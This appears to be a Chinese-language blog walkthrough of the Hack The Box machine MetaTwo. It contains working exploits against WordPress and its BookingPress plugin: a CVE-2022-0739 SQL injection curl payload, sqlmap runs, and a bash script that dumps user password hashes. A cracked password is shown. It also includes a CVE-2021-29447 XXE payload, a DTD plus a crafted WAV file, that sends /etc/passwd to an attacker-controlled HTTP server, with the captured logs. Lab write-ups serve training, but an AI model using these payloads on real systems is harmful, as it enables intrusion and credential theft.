热门标签
热门文章
- 1冒牌货澳本聪被实锤证伪,600万英镑冻结令生效
- 2git解决无法上传fatal: unable to access ‘http://xxxx.git/‘: The requested URL returned error等一系列问题_the requested url returned error: 502
- 3kafka send方法小结_kafka.send
- 4FlinkCDC第四部分-同步mysql到mysql,ctrl就完事~(flink版本1.17.1)_flink 1.17.1 mysql版本
- 5Android应用程序开发期末考试试卷_android应用开发期末考试题
- 6实用高效,27款腾讯热门开源项目推荐
- 7Android Log 的抓取与分析
- 8gitbash使用
- 9大数据 - Spark介绍和环境搭建_spark环境搭建
- 10AD9361射频捷变收发器系列对比_ad9363与9361差别
当前位置: article > 正文
MetaTwo_$0cnkyr9zgpj$
作者:weixin_40725706 | 2024-07-05 19:42:17
赞
踩
$0cnkyr9zgpj$
基础信息
nmap
nmap -sC -sV -oA /root/htb/MetaTwo 10.10.11.186
-sC 表示使用Nmap脚本进行探测
-sV 服务的版本信息
-oA 导出扫描信息到指定的目录
┌──(kali㉿kali)-[~] └─$ nmap -sC -sV 10.10.11.186 Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-10 10:22 CST Nmap scan report for 10.10.11.186 Host is up (0.33s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp? | fingerprint-strings: | GenericLines: | 220 ProFTPD Server (Debian) [::ffff:10.10.11.186] | Invalid command: try being more creative |_ Invalid command: try being more creative 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 c4:b4:46:17:d2:10:2d:8f:ec:1d:c9:27:fe:cd:79:ee (RSA) | 256 2a:ea:2f:cb:23:e8:c5:29:40:9c:ab:86:6d:cd:44:11 (ECDSA) |_ 256 fd:78:c0:b0:e2:20:16:fa:05:0d:eb:d8:3f:12:a4:ab (ED25519) 80/tcp open http nginx 1.18.0 |_http-server-header: nginx/1.18.0 |_http-title: Did not follow redirect to http://metapress.htb/ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port21-TCP:V=7.92%I=7%D=11/10%Time=636C6075%P=x86_64-pc-linux-gnu%r(Gen SF:ericLines,8F,"220\x20ProFTPD\x20Server\x20\(Debian\)\x20\[::ffff:10\.10 SF:\.11\.186\]\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20cr SF:eative\r\n500\x20Invalid\x20command:\x20try\x20being\x20more\x20creativ SF:e\r\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 252.16 seconds
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
访问80的http,看到此页面只有这一个功能点
http://metapress.htb
查看此处的跳转,查看wapp插件发现是一个博客的系统框架wordpress5.6.2
查看源代码,发现bookingpress插件
WordPress
WordPress<=5.7 XXE漏洞
影响范围: WordPress <= 5.7 && php8
类型: Blind XXE
https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/
检测到的代码漏洞是经过身份验证的XML外部实体(XXE)注入。它会影响5.7.1之前的WordPress版本,并且可以允许远程攻击者实现以下目的:
任意文件披露:可以检索主机文件系统上任何文件的内容,例如wp-config.php,其中包含敏感数据,例如数据库凭据。
服务器端请求伪造(SSRF):可以代表WordPress安装发出HTTP请求。根据环境的不同,这可能会产生严重的影响。
首先搭建一个
web服务器存放恶意文件exp.dtd
去服务器上上传payload.wav文件
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.7:12344/?p=%file;'>" >
- 1
- 2
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.16.7:12344/123.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
- 1
- 2
bookingpress
适用于任何基于服务的行业的一体化 WordPress 预约插件,版本为 bookingpress1.0.10
谷歌搜索bookingpress漏洞发现绿盟纰漏了版本也对的上
CVE-2022-0739
https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=adbde3ab66&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -' -x http://127.0.0.1:8080
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: metapress.htb
User-Agent: curl/7.84.0
Accept: */*
Content-Length: 185
Content-Type: application/x-www-form-urlencoded
Connection: close
action=bookingpress_front_get_category_services&_wpnonce=adbde3ab66&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -
wpnonce这个值是需要验证的
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
插件sql漏洞
sqlmap
使用sqlmap发送post包指定传参,一切都自动yes
sqlmap -r post.txt -p total_service --batch
跑数据库名
sqlmap -r post.txt -p total_service --dbs
跑表名
sqlmap -r post.txt -p total_service -D blog --tables
sqlmap resumed the following injection point(s) from stored session: --- Parameter: total_service (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=bookingpress_front_get_category_services&_wpnonce=adbde3ab66&category_id=33&total_service=1) AND (SELECT 3451 FROM (SELECT(SLEEP(5)))zUXg) AND (2900=2900 Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: action=bookingpress_front_get_category_services&_wpnonce=adbde3ab66&category_id=33&total_service=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b6a71,0x774858595672634b795174514b664f4573627a5377717152794165684b644e7274644944714f6e56,0x716b627671),NULL-- - --- [10:17:28] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.24, Nginx 1.18.0 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [10:17:28] [INFO] fetching tables for database: 'blog' Database: blog [27 tables] +--------------------------------------+ | wp_bookingpress_appointment_bookings | | wp_bookingpress_categories | | wp_bookingpress_customers | | wp_bookingpress_customers_meta | | wp_bookingpress_customize_settings | | wp_bookingpress_debug_payment_log | | wp_bookingpress_default_daysoff | | wp_bookingpress_default_workhours | | wp_bookingpress_entries | | wp_bookingpress_form_fields | | wp_bookingpress_notifications | | wp_bookingpress_payment_logs | | wp_bookingpress_services | | wp_bookingpress_servicesmeta | | wp_bookingpress_settings | | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | +--------------------------------------+ [10:17:29] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb' [*] ending @ 10:17:29 /2022-11-16/
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
sqlmap resumed the following injection point(s) from stored session: --- Parameter: total_service (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=bookingpress_front_get_category_services&_wpnonce=adbde3ab66&category_id=33&total_service=1) AND (SELECT 3451 FROM (SELECT(SLEEP(5)))zUXg) AND (2900=2900 Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: action=bookingpress_front_get_category_services&_wpnonce=adbde3ab66&category_id=33&total_service=1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b6a71,0x774858595672634b795174514b664f4573627a5377717152794165684b644e7274644944714f6e56,0x716b627671),NULL-- - --- [10:30:26] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.0.24, Nginx 1.18.0 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) [10:30:26] [INFO] fetching columns for table 'wp_users' in database 'blog' [10:30:27] [INFO] fetching entries for table 'wp_users' in database 'blog' [10:30:27] [INFO] recognized possible password hashes in column 'user_pass' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [10:30:27] [INFO] using hash method 'phpass_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/share/sqlmap/data/txt/smalldict.txt' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [10:30:27] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [10:30:27] [INFO] starting dictionary-based cracking (phpass_passwd) [10:30:27] [INFO] starting 4 processes [10:32:17] [WARNING] no clear password(s) found Database: blog Table: wp_users [2 entries] +----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+ | ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key | +----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+ | 1 | http://metapress.htb | $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. | admin@metapress.htb | admin | 0 | admin | admin | 2022-06-23 17:58:28 | <blank> | | 2 | <blank> | $P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70 | manager@metapress.htb | manager | 0 | manager | manager | 2022-06-23 18:07:55 | <blank> | +----+----------------------+------------------------------------+-----------------------+------------+-------------+--------------+---------------+---------------------+---------------------+ [10:32:18] [INFO] table 'blog.wp_users' dumped to CSV file '/root/.local/share/sqlmap/output/metapress.htb/dump/blog/wp_users.csv' [10:32:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/metapress.htb' [*] ending @ 10:32:18 /2022-11-16/
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
sqlmap -r post.rep -p total_service --batch -D blog
-tables --fresh-queries --proxy="http://127.0.0.1:8080
"
--fresh-queries 不走缓存
--proxy="http://127.0.0.1:8080" 走代理
- 1
- 2
- 3
- 4
- 5
脚本
https://github.com/Chris01s/CVE-2022-0739
概念验证漏洞(1.0.11之前的SQLI BookingPress)
./sqli_exploit.sh 'http://metapress.htb/events/'
figlet -f slant "BookingPress CVE-2022-0739" url=$1 baseurl=$(echo $url | cut -d '/' -f1-3) echo "[+] Exploiting $baseurl ..." echo "[+] Vulnerable url at $url..." echo "[+] Gettting nonce..." nonce=$(curl $url 2>/dev/null | grep "nonce" | tr ',' '\n' | grep "nonce" | cut -d "'" -f2 | head -n 1) echo "[+] Found nonce: $nonce" printf '[+] Extract database name...\n\n' for i in `seq 0 20` do table=$(curl "$baseurl/wp-admin/admin-ajax.php" --data "action=bookingpress_front_get_category_services&_wpnonce=$nonce&category_id=33&total_service=-7502) UNION ALL SELECT schema_name,1,1,1,2,3,4,5,6 FROM information_schema.schemata LIMIT 1 OFFSET $i-- -" 2>/dev/null | tr -d '[' | tr -d ']' | tr ',' '\n' | cut -d '"' -f4 | head -n 1 | tr -d ' ') echo $table if [ "$table" == "" ] then break fi done printf "\n[+] Getting creds...\n" for i in `seq 0 100` do creds=$(curl $baseurl'/wp-admin/admin-ajax.php' --data "action=bookingpress_front_get_category_services&_wpnonce=$nonce&category_id=33&total_service=-7502) UNION ALL SELECT user_login,user_pass,1,1,2,3,4,5,6 FROM wp_users LIMIT 1 OFFSET $i-- -" 2>/dev/null | tr -d '[' | tr -d ']' | tr ',' '\n' | cut -d '"' -f4 | head -n 2 | tr -d ' ') echo $creds if [ "$creds" == "" ] then exit fi done
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
┌──(kali㉿kali)-[~/htb/MetaTwo] └─$ ./sqli_exploit.sh 'http://metapress.htb/events/' [+] Exploiting http://metapress.htb ... [+] Vulnerable url at http://metapress.htb/events/... [+] Gettting nonce... [+] Found nonce: 8c439df783 [+] Extract database name... information_schema ./sqli_exploit.sh: 22: [: information_schema: unexpected operator blog ./sqli_exploit.sh: 22: [: blog: unexpected operator ./sqli_exploit.sh: 22: [: unexpected operator ./sqli_exploit.sh: 22: [: unexpected operator [+] Getting creds... admin $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV. ./sqli_exploit.sh: 33: [: admin $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.: unexpected operator manager $P$B4aNM28N0E.tMy\/JIcnVMZbGcU16Q70 ./sqli_exploit.sh: 33: [: manager $P$B4aNM28N0E.tMy\/JIcnVMZbGcU16Q70: unexpected operator ./sqli_exploit.sh: 33: [: unexpected operator
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
数据库名为:blog
账户为admin、manager
密码哈希: $P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.
$P$B4aNM28N0E.tMy/JIcnVMZbGcU16Q70
破解hash
hash-identifier
会推出hash的解密方式
findmyhash
john 破解hash
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
partylikearockstar (?)
1g 0:00:30:04 98.52% (ETA: 00:31:20) 0.000554g/s 7840p/s 7901c/s 7901C/s 023796989..023762210
1g 0:00:30:08 98.73% (ETA: 00:31:20) 0.000553g/s 7839p/s 7900c/s 7900C/s 018297708..0182652736
1g 0:00:30:28 DONE (2022-11-16 00:31) 0.000546g/s 7842p/s 7903c/s 7903C/s joefeher..*7¡Vamos!
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
john工具对于同一个shadow文件只会进行一次爆破,如果第二次执行john shadow是不会得到结果的,
可以去shadow的文件使用john --show hash去查看
尝试登录
manager
partylikearockstar
ssh登录
失败
ftp登录
失败
找管理页面
┌──(root㉿kali)-[/home/kali/htb/MetaTwo] └─# dirsearch -u http://metapress.htb/ _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GETThreads: 30 | Wordlist size: 10927 Output File: /root/.dirsearch/reports/metapress.htb/-_22-11-17_15-20-41.txt Error Log: /root/.dirsearch/logs/errors-22-11-17_15-20-41.log Target: http://metapress.htb/ [15:20:43] Starting: [15:24:54] 200 - 633B - /.htaccess [15:31:45] 301 - 0B - /0 -> http://metapress.htb/0/ [15:39:08] 301 - 0B - /A -> http://metapress.htb/about-us/ [15:39:09] 301 - 0B - /a -> http://metapress.htb/about-us/ [15:39:10] 301 - 0B - /ab/ -> http://metapress.htb/about-us/ [15:39:10] 301 - 0B - /about -> http://metapress.htb/about-us/ [15:39:10] 301 - 0B - /about-us -> http://metapress.htb/about-us/ [15:40:26] 302 - 0B - /admin -> http://metapress.htb/wp-admin/ [15:40:41] 301 - 0B - /admin. -> http://metapress.htb/admin [15:40:47] 302 - 0B - /admin/ -> http://metapress.htb/wp-admin/ [15:45:16] 301 - 0B - /asset.. -> http://metapress.htb/asset [15:45:16] 301 - 0B - /atom -> http://metapress.htb/feed/atom/ [15:46:07] 301 - 0B - /c -> http://metapress.htb/cancel-appointment/ [15:46:27] 302 - 0B - /dashboard -> http://metapress.htb/wp-admin/ [15:46:53] 301 - 0B - /e -> http://metapress.htb/events/ [15:46:55] 301 - 0B - /engine/classes/swfupload//swfupload.swf -> http://metapress.htb/engine/classes/swfupload/swfupload.swf [15:46:55] 301 - 0B - /engine/classes/swfupload//swfupload_f9.swf -> http://metapress.htb/engine/classes/swfupload/swfupload_f9.swf [15:46:56] 301 - 0B - /events -> http://metapress.htb/events/ [15:46:57] 301 - 0B - /extjs/resources//charts.swf -> http://metapress.htb/extjs/resources/charts.swf [15:46:59] 301 - 0B - /feed -> http://metapress.htb/feed/ [15:47:09] 301 - 0B - /h -> http://metapress.htb/hello-world/ [15:47:15] 301 - 0B - /hello -> http://metapress.htb/hello-world/ [15:47:30] 301 - 0B - /html/js/misc/swfupload//swfupload.swf -> http://metapress.htb/html/js/misc/swfupload/swfupload.swf [15:47:49] 301 - 0B - /index.php -> http://metapress.htb/ [15:47:52] 301 - 0B - /index.php/login/ -> http://metapress.htb/login/ [15:48:09] 200 - 19KB - /license.txt [15:48:17] 302 - 0B - /login -> http://metapress.htb/wp-login.php [15:48:18] 301 - 0B - /login.wdm%20 -> http://metapress.htb/login.wdm [15:48:18] 302 - 0B - /login/ -> http://metapress.htb/wp-login.php [15:48:18] 301 - 0B - /login.wdm%2e -> http://metapress.htb/login.wdm [15:49:43] 301 - 0B - /phpmyadmin!! -> http://metapress.htb/phpmyadmin [15:49:54] 301 - 0B - /public.. -> http://metapress.htb/public [15:49:56] 301 - 0B - /rating_over. -> http://metapress.htb/rating_over [15:49:57] 200 - 7KB - /readme.html [15:50:07] 200 - 113B - /robots.txt [15:50:09] 301 - 0B - /rss -> http://metapress.htb/feed/ [15:50:27] 301 - 0B - /sample -> http://metapress.htb/sample-page/
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
http://metapress.htb/wp-admin/
http://metapress.htb/login/
manager
partylikearockstar
WordPress框架xxe漏洞
首先搭建一个
web服务器存放恶意文件exp.dtd
去服务器上上传payload.wav文件
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.7:12344/?p=%file;'>" >
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.12:12344/?p=%file;'>" >
<!ENTITY cmd SYSTEM "expect://id">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.10.16.7:12344/?p=%file;'>" >
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.16.12:12344/123.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
- 1
在这个页面起一个web服务器
python2 -m SimpleHTTPServer 12344
之后在此文件中开启web服务
┌──(root㉿kali)-[/home/kali/tools/htb/MetaTwo]
└─# python2 -m SimpleHTTPServer 12344
Serving HTTP on 0.0.0.0 port 12344 ...
127.0.0.1 - - [17/Nov/2022 22:35:59] "GET / HTTP/1.1" 200 -
10.10.11.186 - - [17/Nov/2022 22:36:13] code 404, message File not found
10.10.11.186 - - [17/Nov/2022 22:36:13] "GET /123.dtd HTTP/1.1" 404 -
10.10.11.186 - - [17/Nov/2022 22:36:15] code 404, message File not found
10.10.11.186 - - [17/Nov/2022 22:36:15] "GET /123.dtd HTTP/1.1" 404 -
10.10.11.186 - - [17/Nov/2022 22:38:09] "GET /123.dtd HTTP/1.1" 200 -
10.10.11.186 - - [17/Nov/2022 22:38:12] "GET /?p=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTA0OjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kam5lbHNvbjp4OjEwMDA6MTAwMDpqbmVsc29uLCwsOi9ob21lL2puZWxzb246L2Jpbi9iYXNoCnN5c3RlbWQtdGltZXN5bmM6eDo5OTk6OTk5OnN5c3RlbWQgVGltZSBTeW5jaHJvbml6YXRpb246LzovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLWNvcmVkdW1wOng6OTk4Ojk5ODpzeXN0ZW1kIENvcmUgRHVtcGVyOi86L3Vzci9zYmluL25vbG9naW4KbXlzcWw6eDoxMDU6MTExOk15U1FMIFNlcnZlciwsLDovbm9uZXhpc3RlbnQ6L2Jpbi9mYWxzZQpwcm9mdHBkOng6MTA2OjY1NTM0OjovcnVuL3Byb2Z0cGQ6L3Vzci9zYmluL25vbG9naW4KZnRwOng6MTA3OjY1NTM0Ojovc3J2L2Z0cDovdXNyL3NiaW4vbm9sb2dpbgo= HTTP/1.1" 200 -
10.10.11.186 - - [17/Nov/2022 22:38:13] "GET /123.dtd HTTP/1.1" 200 -
10.10.11.186 - - [17/Nov/2022 22:38:15] "GET /?p=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovcnVuL2lyY2Q6L3Vzci9zYmluL25vbG9naW4KZ25hdHM6eDo0MTo0MTpHbmF0cyBCdWctUmVwb3J0aW5nIFN5c3RlbSAoYWRtaW4pOi92YXIvbGliL2duYXRzOi91c3Ivc2Jpbi9ub2xvZ2luCm5vYm9keTp4OjY1NTM0OjY1NTM0Om5vYm9keTovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KX2FwdDp4OjEwMDo2NTUzNDo6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtbmV0d29yazp4OjEwMToxMDI6c3lzdGVtZCBOZXR3b3JrIE1hbmFnZW1lbnQsLCw6L3J1bi9zeXN0ZW1kOi91c3Ivc2Jpbi9ub2xvZ2luCnN5c3RlbWQtcmVzb2x2ZTp4OjEwMjoxMDM6c3lzdGVtZCBSZXNvbHZlciwsLDovcnVuL3N5c3RlbWQ6L3Vzci9zYmluL25vbG9naW4KbWVzc2FnZWJ1czp4OjEwMzoxMDk6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOng6MTA0OjY1NTM0OjovcnVuL3NzaGQ6L3Vzci9zYmluL25vbG9naW4Kam5lbHNvbjp4OjEwMDA6MTAwMDpqbmVsc29uLCwsOi9ob21lL2puZWxzb246L2Jpbi9iYXNoCnN5c3RlbWQtdGltZXN5bmM6eDo5OTk6OTk5OnN5c3RlbWQgVGltZSBTeW5jaHJvbml6YXRpb246LzovdXNyL3NiaW4vbm9sb2dpbgpzeXN0ZW1kLWNvcmVkdW1wOng6OTk4Ojk5ODpzeXN0ZW1kIENvcmUgRHVtcGVyOi86L3Vzci9zYmluL25vbG9naW4KbXlzcWw6eDoxMDU6MTExOk15U1FMIFNlcnZlciwsLDovbm9uZXhpc3RlbnQ6L2Jpbi9mYWxzZQpwcm9mdHBkOng6MTA2OjY1NTM0OjovcnVuL3Byb2Z0cGQ6L3Vzci9zYmluL25vbG9naW4KZnRwOng6MTA3OjY1NTM0Ojovc3J2L2Z0cDovdXNyL3NiaW4vbm9sb2dpbgo= HTTP/1.1" 200 -
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
进行base64解密
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin :x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin 